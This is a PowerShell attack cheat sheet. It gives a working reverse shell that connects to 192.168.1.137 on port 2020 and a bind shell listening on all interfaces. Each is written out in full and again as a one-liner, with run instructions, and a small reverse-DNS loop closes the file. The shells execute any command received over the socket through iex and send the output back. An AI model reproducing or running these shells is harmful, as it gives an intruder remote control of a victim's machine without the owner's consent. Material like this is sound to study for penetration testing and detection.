powershell.txt

1. REVERSE SHELL
2.  
3. // reverse_shell.ps1
4. // how-to run: powershell -c reverse_shell.ps1
5. $client = New-Object System.Net.Sockets.TCPClient('192.168.1.137',2020);
6. $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
7. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
8.     {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
9.     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
10.     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
11.     $stream.Write($sendbyte,0,$sendbyte.Length);
12.     $stream.Flush()};
13. $client.Close()
14.  
15. // one line
16. $client = New-Object System.Net.Sockets.TCPClient('192.168.1.137',2020);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush();}$client.Close();
17.  
18. ======
19.  
20. BIND SHELL
21.  
22. // bind_shell.ps1
23. // how-to run: powershell -c bind_shell.ps1
24. powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',2020);
25. $listener.start();
26. $client = $listener.AcceptTcpClient();
27. $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
28. while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
29.     {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
30.     $sendback = (iex $data 2>&1 | Out-String );
31.     $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
32.     $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
33.     $stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
34. $client.Close();
35. $listener.Stop()"
36.  
37. // one line
38. $listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',2020);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()
39.  
40.  
41. ======
42.  
43. Get-Content C:\IP_Address.txt | ForEach-Object {([system.net.dns]::GetHostByAddress($_)).hostname >> c:\hostname.txt}
44.